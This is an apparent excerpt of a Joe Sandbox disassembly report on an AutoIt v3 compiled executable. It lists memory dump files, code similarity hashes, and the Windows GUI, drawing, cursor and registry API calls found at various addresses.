                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                          • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                          • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                          • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                          • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                          • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                          • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                          • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                          • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                          • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                          • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                          • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                          • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                          APIs
                          • DeleteObject.GDI32(?), ref: 0045953B
                          • DeleteObject.GDI32(?), ref: 00459551
                          • DestroyWindow.USER32(?), ref: 00459563
                          • GetDesktopWindow.USER32 ref: 00459581
                          • GetWindowRect.USER32(00000000), ref: 00459588
                          • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                          • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                          • GetClientRect.USER32(00000000,?), ref: 004596F8
                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                          • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                          • GlobalLock.KERNEL32(00000000), ref: 0045978F
                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                          • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                          • CloseHandle.KERNEL32(00000000), ref: 004597AC
                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                          • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                          • GlobalFree.KERNEL32(00000000), ref: 004597E2
                          • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                          • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                          • ShowWindow.USER32(?,00000004), ref: 00459865
                          • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                          • GetStockObject.GDI32(00000011), ref: 004598CD
                          • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                          • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                          • DeleteDC.GDI32(00000000), ref: 004598F8
                          • _wcslen.LIBCMT ref: 00459916
                          • _wcscpy.LIBCMT ref: 0045993A
                          • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                          • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                          • GetDC.USER32(00000000), ref: 004599FC
                          • SelectObject.GDI32(00000000,?), ref: 00459A0C
                          • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                          • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                          • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                          • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                          • String ID: $AutoIt v3$DISPLAY$static
                          • API String ID: 4040870279-2373415609
                          • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                          • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                          • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                          • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                          APIs
                          • GetSysColor.USER32(00000012), ref: 0044181E
                          • SetTextColor.GDI32(?,?), ref: 00441826
                          • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                          • GetSysColor.USER32(0000000F), ref: 00441849
                          • SetBkColor.GDI32(?,?), ref: 00441864
                          • SelectObject.GDI32(?,?), ref: 00441874
                          • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                          • GetSysColor.USER32(00000010), ref: 004418B2
                          • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                          • FrameRect.USER32(?,?,00000000), ref: 004418CA
                          • DeleteObject.GDI32(?), ref: 004418D5
                          • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                          • FillRect.USER32(?,?,?), ref: 00441970
                            • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                            • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                            • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                            • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                            • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                            • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                            • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                            • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                            • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                            • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                            • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                            • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                            • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                          • String ID:
                          • API String ID: 69173610-0
                          • Opcode ID: 0916c3cf28f962cebf3c58740b3ff5bfe8190551d5af4ba49c76a685ec03c0b9
                          • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                          • Opcode Fuzzy Hash: 0916c3cf28f962cebf3c58740b3ff5bfe8190551d5af4ba49c76a685ec03c0b9
                          • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                          APIs
                          • DestroyWindow.USER32(?), ref: 004590F2
                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                          • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                          • GetClientRect.USER32(00000000,?), ref: 0045924E
                          • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                          • GetStockObject.GDI32(00000011), ref: 004592AC
                          • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                          • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                          • DeleteDC.GDI32(00000000), ref: 004592D6
                          • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                          • GetStockObject.GDI32(00000011), ref: 004593D3
                          • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                          • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                          • API String ID: 2910397461-517079104
                          • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                          • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                          • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                          • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: __wcsnicmp
                          • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                          • API String ID: 1038674560-3360698832
                          • Opcode ID: 60e7c0ccc2de36542d37a783a5f9e034653244a609c45985bfd1ff28648e5169
                          • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                          • Opcode Fuzzy Hash: 60e7c0ccc2de36542d37a783a5f9e034653244a609c45985bfd1ff28648e5169
                          • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                          APIs
                          • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                          • SetCursor.USER32(00000000), ref: 0043075B
                          • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                          • SetCursor.USER32(00000000), ref: 00430773
                          • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                          • SetCursor.USER32(00000000), ref: 0043078B
                          • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                          • SetCursor.USER32(00000000), ref: 004307A3
                          • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                          • SetCursor.USER32(00000000), ref: 004307BB
                          • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                          • SetCursor.USER32(00000000), ref: 004307D3
                          • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                          • SetCursor.USER32(00000000), ref: 004307EB
                          • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                          • SetCursor.USER32(00000000), ref: 00430803
                          • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                          • SetCursor.USER32(00000000), ref: 0043081B
                          • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                          • SetCursor.USER32(00000000), ref: 00430833
                          • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                          • SetCursor.USER32(00000000), ref: 0043084B
                          • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                          • SetCursor.USER32(00000000), ref: 00430863
                          • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                          • SetCursor.USER32(00000000), ref: 0043087B
                          • SetCursor.USER32(00000000), ref: 00430887
                          • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                          • SetCursor.USER32(00000000), ref: 0043089F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Cursor$Load
                          • String ID:
                          • API String ID: 1675784387-0
                          • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                          • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                          • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                          • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                          APIs
                          • GetSysColor.USER32(0000000E), ref: 00430913
                          • SetTextColor.GDI32(?,00000000), ref: 0043091B
                          • GetSysColor.USER32(00000012), ref: 00430933
                          • SetTextColor.GDI32(?,?), ref: 0043093B
                          • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                          • GetSysColor.USER32(0000000F), ref: 00430959
                          • CreateSolidBrush.GDI32(?), ref: 00430962
                          • GetSysColor.USER32(00000011), ref: 00430979
                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                          • SelectObject.GDI32(?,00000000), ref: 0043099C
                          • SetBkColor.GDI32(?,?), ref: 004309A6
                          • SelectObject.GDI32(?,?), ref: 004309B4
                          • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                          • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                          • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                          • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                          • DrawFocusRect.USER32(?,?), ref: 00430A91
                          • GetSysColor.USER32(00000011), ref: 00430A9F
                          • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                          • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                          • SelectObject.GDI32(?,?), ref: 00430AD0
                          • DeleteObject.GDI32(00000105), ref: 00430ADC
                          • SelectObject.GDI32(?,?), ref: 00430AE3
                          • DeleteObject.GDI32(?), ref: 00430AE9
                          • SetTextColor.GDI32(?,?), ref: 00430AF0
                          • SetBkColor.GDI32(?,?), ref: 00430AFB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                          • String ID:
                          • API String ID: 1582027408-0
                          • Opcode ID: 86b869e5b8bb6c2dba163effb8278b4f001f0824fd106c928e18bea154194c17
                          • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                          • Opcode Fuzzy Hash: 86b869e5b8bb6c2dba163effb8278b4f001f0824fd106c928e18bea154194c17
                          • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                          APIs
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                          • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: CloseConnectCreateRegistry
                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                          • API String ID: 3217815495-966354055
                          • Opcode ID: cce921d97e24dbf253ef9f1627752c5d4fb6d5c9aca8633edc33abbdd9bc0d54
                          • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                          • Opcode Fuzzy Hash: cce921d97e24dbf253ef9f1627752c5d4fb6d5c9aca8633edc33abbdd9bc0d54
                          • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                          APIs
                          • GetCursorPos.USER32(?), ref: 004566AE
                          • GetDesktopWindow.USER32 ref: 004566C3
                          • GetWindowRect.USER32(00000000), ref: 004566CA
                          • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                          • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                          • DestroyWindow.USER32(?), ref: 00456746
                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                          • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                          • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                          • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                          • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                          • IsWindowVisible.USER32(?), ref: 0045682C
                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                          • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                          • GetWindowRect.USER32(?,?), ref: 00456873
